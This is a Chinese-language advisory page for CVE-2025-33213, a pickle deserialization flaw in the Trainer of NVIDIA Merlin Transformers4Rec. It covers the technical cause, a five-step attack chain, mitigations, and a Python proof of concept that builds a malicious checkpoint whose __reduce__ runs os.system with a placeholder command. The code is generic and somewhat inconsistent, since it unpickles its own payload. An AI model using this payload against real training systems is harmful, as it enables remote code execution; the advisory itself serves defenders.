CVE-2025-33213 NVIDIA Merlin Transformers4Rec 反序列化代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-33213

漏洞类型

反序列化漏洞/远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

NVIDIA Merlin Transformers4Rec for Linux

漏洞概述

CVE-2025-33213是NVIDIA Merlin Transformers4Rec中存在的一个高危安全漏洞，位于Trainer组件中。该漏洞源于不安全的反序列化处理，攻击者可以通过构造恶意序列化数据触发反序列化过程，从而实现远程代码执行（RCE）。成功利用此漏洞可能导致多种严重后果，包括：在目标系统上执行任意代码、造成服务拒绝（DoS）、敏感信息泄露以及数据篡改等。该漏洞的CVSS评分为8.8，属于高危级别，攻击复杂度较低，无需认证即可发起攻击，但需要用户交互。NVIDIA Merlin Transformers4Rec是NVIDIA推出的用于推荐系统的深度学习框架，广泛应用于大规模机器学习任务中。漏洞的发现者为NVIDIA安全团队（[email protected]），披露日期为2025年12月9日。由于该漏洞影响机器学习训练流程中的核心组件，建议用户立即采取修复措施以防止潜在的安全风险。

技术细节

该漏洞位于NVIDIA Merlin Transformers4Rec的Trainer组件中，主要涉及不安全的Python pickle反序列化操作。在机器学习训练过程中，Trainer组件需要处理和恢复各种模型对象、配置参数和中间状态，这些数据通常以序列化形式存储和传输。漏洞的根本原因在于：1）Trainer组件在加载外部提供的序列化对象时，未进行充分的安全验证；2）直接使用pickle.loads()或类似的反序列化函数处理不可信数据；3）缺乏对反序列化对象的类型检查和完整性校验。攻击者可以通过以下方式利用此漏洞：构造包含恶意__reduce__()方法的Python对象，该方法在反序列化时自动执行任意代码；通过精心设计的pickle payload，在反序列化过程中触发系统命令执行、文件读写或网络请求等操作。由于Transformer4Rec在处理用户输入的训练数据时可能涉及模型状态的保存和恢复，攻击者可以通过上传恶意训练数据或模型checkpoint来触发漏洞。此类反序列化漏洞是Python应用中最危险的安全问题之一，因为Python的pickle模块在设计时并未考虑安全性，允许在反序列化时执行任意代码。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统是否运行NVIDIA Merlin Transformers4Rec，并定位Trainer组件的使用位置

STEP 2

步骤2：构造恶意Payload

攻击者创建包含恶意__reduce__()方法的Python对象，通过pickle序列化生成可用于反序列化代码执行的payload

STEP 3

步骤3：投递恶意数据

攻击者将恶意序列化数据注入到训练流程中，可能通过恶意checkpoint文件、配置文件或用户输入等方式传递给Trainer组件

STEP 4

步骤4：触发反序列化

当Trainer组件加载并反序列化攻击者提供的恶意数据时，payload中的__reduce__()方法自动执行，导致任意代码在服务器上运行

STEP 5

步骤5：达成攻击目标

攻击者成功执行代码后，可实现远程代码执行、服务拒绝、信息窃取或数据篡改等恶意目的

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import pickle
import base64
import os

# CVE-2025-33213 PoC - Malicious pickle payload for deserialization RCE
# Target: NVIDIA Merlin Transformers4Rec Trainer component

class Exploit:
    def __reduce__(self):
        # This will execute when the object is unpickled
        cmd = "whoami > /tmp/pwned.txt"  # Replace with actual attack command
        return (os.system, (cmd,))

def generate_payload():
    """Generate malicious pickle payload"""
    exploit_obj = Exploit()
    payload = pickle.dumps(exploit_obj)
    return base64.b64encode(payload).decode('utf-8')

def create_malicious_checkpoint():
    """Create a malicious checkpoint file that can be loaded by Trainer"""
    payload = generate_payload()
    malicious_data = {
        'model_state': pickle.loads(base64.b64decode(payload)),
        'version': 'vulnerable_version'
    }
    with open('malicious_checkpoint.pkl', 'wb') as f:
        pickle.dump(malicious_data, f)
    return payload

if __name__ == '__main__':
    print("CVE-2025-33213 PoC for NVIDIA Merlin Transformers4Rec")
    print("=" * 60)
    payload = generate_payload()
    print(f"Malicious payload (base64):\n{payload}")
    print("\nNote: This payload will execute 'whoami' command when unpickled")
    print("Attack vector: Load this payload through Trainer checkpoint loading")

影响范围

NVIDIA Merlin Transformers4Rec < 修复版本

Transformers4Rec Trainer组件（所有版本）

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）限制对Trainer组件的访问权限，确保只有授权用户可以上传训练数据和模型checkpoint；2）实施严格的输入验证机制，对所有外部提供的序列化数据进行安全检查；3）考虑使用沙箱环境隔离Trainer组件的执行，防止潜在的代码执行影响主系统；4）监控和记录Trainer相关的文件加载操作，及时发现异常行为；5）如果可能，暂时禁用checkpoint加载功能或使用白名单机制限制可加载的模型文件。